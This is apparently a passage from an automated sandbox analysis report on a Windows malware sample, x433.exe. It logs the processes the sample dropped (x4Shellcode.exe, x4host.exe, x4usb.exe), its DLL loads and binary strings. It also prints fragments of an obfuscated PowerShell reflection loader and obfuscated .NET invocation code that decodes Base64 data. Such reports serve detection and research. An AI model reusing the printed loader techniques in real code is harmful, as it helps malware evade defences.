Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}
                      Source: unknownProcess created: C:\Users\user\AppData\Local\x4usb.exe "C:\Users\user\AppData\Local\x4usb.exe"
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe "C:\Users\user\AppData\Local\Temp\x4Shellcode.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\x433.exeProcess created: C:\Users\user\AppData\Local\Temp\x4host.exe "C:\Users\user\AppData\Local\Temp\x4host.exe" Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}Jump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\x433.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\dllhost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\spoolsv.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\x4usb.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dll
                      Source: C:\Users\user\Desktop\x433.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: x4usb.lnk.2.drLNK file: ..\..\..\..\..\..\Local\x4usb.exe
                      Source: C:\Users\user\Desktop\x433.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: x433.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: x433.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WINLOA~1.PDB source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.k1dFRPlIGo1RTvRjnXMTxWfy6rA6wb04XVXXgyuhzervWpFow2aKTZxPPAhi2ObTh0OiRmNAWFz65LSgKc5e5PAg,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.NCrWGNhDUjKd4bDw1z4BZBIvFqbvbwlqLKOj3VQUYJmNb6dx8D8FECk38FnZYn3wQs7994mFYgPZWW6ZZqVhhef3,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.pCDeg8Pi40eWuzUFiMHVM4fQZLPXfikQ4VJGywZtMiDPKpgoHP1iqh3HhjRT2ndTBoGATXnC7UPztmPNrFeSPa1w,hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1._9jIq11pOiUTPkTJ76ybIKboztPb3B1sCO5R9orQ37qX7P9J0r8ctqtC6Ka1YZnzF72XuHNlpWAY5dDX2mSITmSaS,etNX0TntxxQcULpBdpvLQMPzQQj7vk.ttGbKN3IQCFg51R()}}, (string[])null, (Type[])null, (bool[])null, true)
                      Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[2],etNX0TntxxQcULpBdpvLQMPzQQj7vk.hzgThPBBZDd3tmW(Convert.FromBase64String(XnFsuZOMgti1ZJ2M7oLi9mifPt8tYB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
